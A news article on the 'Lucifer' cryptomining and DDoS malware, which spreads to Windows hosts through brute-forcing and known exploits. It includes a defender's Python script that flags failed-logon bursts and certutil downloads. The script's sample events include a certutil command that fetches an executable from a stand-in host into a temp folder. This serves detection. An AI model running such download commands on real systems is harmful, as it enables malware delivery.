
'Lucifer' malware targets Windows machines using NSA exploits: Protect yourself now

(Image: Windows running on a laptop. Image credit: Wachiwit / Shutterstock.com)

Security researchers have found a new malware strain that hijacks vulnerable Windows devices to mine cryptocurrency and stage devastating DDoS attacks, leading the researchers to prompt PC users and server administrators to ensure that they are being protected by the best antivirus software.

The malware, called "Lucifer" by its discoverers at cybersecurity firm Palo Alto Networks' Unit 42, "brute forces" its way into Windows machines by trying out common usernames and passwords on widely used system ports.

The malware primarily targets enterprise servers, especially since those servers can provide entry into corporate networks, but can also infect personal computers.

Unit 42 came across the malware while investigating exploitation of CVE-2019-9081, a vulnerability in the open-source Laravel web-application framework that enables perpetrators to conduct remote-code-execution attacks.

“A closer look revealed the malware, which we’ve dubbed ‘Lucifer’, is capable of conducting DDoS attacks and [is] well-equipped with all kinds of exploits against vulnerable Windows hosts,” wrote the Unit 42 researchers in a blog post.

(Lucifer's own creators call the malware "Satan DDoS," but Unit 42 thought that might cause confusion as there's already "Satan" ransomware.)

“The first wave of the campaign stopped on June 10, 2020. The attacker then resumed their campaign on June 11, 2020, spreading an upgraded version of the malware and wreaking havoc.”

Powerful malware threat

The researchers described Lucifer as “quite powerful in its capabilities.” Once it has infected a system, it lets the perpetrators mine the Monero cryptocurrency and spread to other machines on the local network using the EternalBlue, EternalRomance and DoublePulsar exploits that were stolen from the U.S. National Security Agency some years ago.

According to the researchers, hackers are “weaponising” a range of security vulnerabilities using the Lucifer malware.

Identified by Common Vulnerabilities and Exposures (CVE) ID numbers, these include CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, ThinkPHP RCE vulnerabilities (CVE-2018-20062), CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, PHPStudy Backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464.

“These vulnerabilities have either high or critical ratings due to their trivial-to-exploit nature and their tremendous impact inflicted on the victim,” explained the researchers.

“Once exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation.”

Certutil.exe is a command-line utility built into Windows for managing the digital certificates and certificate services that underpin secure internet communications. Because it can also fetch and decode files, it is routinely abused as a ready-made downloader, which is why unexpected certutil invocations on servers and workstations are worth alerting on.
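As an added defender's example (not code from Unit 42 or from this article), the Python script below flags the two behaviours the article describes: a source host producing a burst of failed logons, which is what credential brute-forcing looks like in the Security log, and certutil.exe being launched with a URL on its command line. It assumes Windows Security events have been exported one per line in the constructed key=value layout shown; the sample events and the hostnames in them are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry): Windows Security log lines as a
# SIEM export might flatten them; 4625 = failed logon, 4688 = process creation.
SAMPLE_EVENTS = r"""
2020-06-11T08:00:01 EventID=4625 Account=administrator Source=10.0.0.7
2020-06-11T08:00:02 EventID=4625 Account=admin Source=10.0.0.7
2020-06-11T08:00:03 EventID=4625 Account=root Source=10.0.0.7
2020-06-11T08:00:04 EventID=4625 Account=user Source=10.0.0.7
2020-06-11T08:00:05 EventID=4625 Account=test Source=10.0.0.7
2020-06-11T08:30:00 EventID=4625 Account=jsmith Source=10.0.0.9
2020-06-11T08:31:00 EventID=4688 Process=C:\Windows\System32\certutil.exe CommandLine="certutil -urlcache -f http://example.invalid/x.exe C:\Windows\Temp\x.exe"
2020-06-11T09:00:00 EventID=4688 Process=C:\Windows\System32\certutil.exe CommandLine="certutil -dump C:\certs\server.cer"
"""
EVENT_RE = re.compile(r'^(\S+) EventID=(\d+) (.*)$')   # timestamp, id, key=value rest
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')             # quoted or bare values

def parse_events(text):
    """Flattened lines -> dicts with a datetime `time` and an int `EventID`."""
    events = []
    for m in filter(None, map(EVENT_RE.match, text.splitlines())):
        ts, eid, rest = m.groups()
        e = {k: v.strip('"') for k, v in KV_RE.findall(rest)}
        e["time"], e["EventID"] = datetime.fromisoformat(ts), int(eid)
        events.append(e)
    return events

def brute_force_sources(events, threshold=5, window=timedelta(minutes=5)):
    """Source IPs with at least `threshold` failed logons inside any `window`."""
    by_src = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            by_src[e["Source"]].append(e["time"])
    flagged = set()
    for src, t in by_src.items():
        t.sort()   # sliding window over sorted timestamps
        if any(t[i + threshold - 1] - t[i] <= window for i in range(len(t) - threshold + 1)):
            flagged.add(src)
    return flagged

def certutil_with_url(events):
    """certutil.exe given a URL: certificate management rarely needs one, so treat it as a download indicator."""
    return [e["CommandLine"] for e in events
            if e["EventID"] == 4688 and e.get("Process", "").lower().endswith("certutil.exe")
            and re.search(r"https?://", e.get("CommandLine", ""), re.I)]
```

Both checks need command-line auditing (for 4688) and failed-logon auditing enabled on the host; tune the threshold and window to your environment's normal failure rate.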

How to avoid the Lucifer malware

Although these vulnerabilities are certainly worrying, the researchers noted how patches are “readily available” and urged organisations to keep their systems updated to mitigate attacks.

The researchers added: “While the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it’s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance.”

To keep your Windows system, whether it's a laptop or a web server, from being hit by the Lucifer malware, ensure it's fully patched with the latest Windows security updates and that the system-administrator username and password are strong and unique.

Of course, it helps to be running some of the best antivirus software, most of which will recognize and block Lucifer and its various components right away.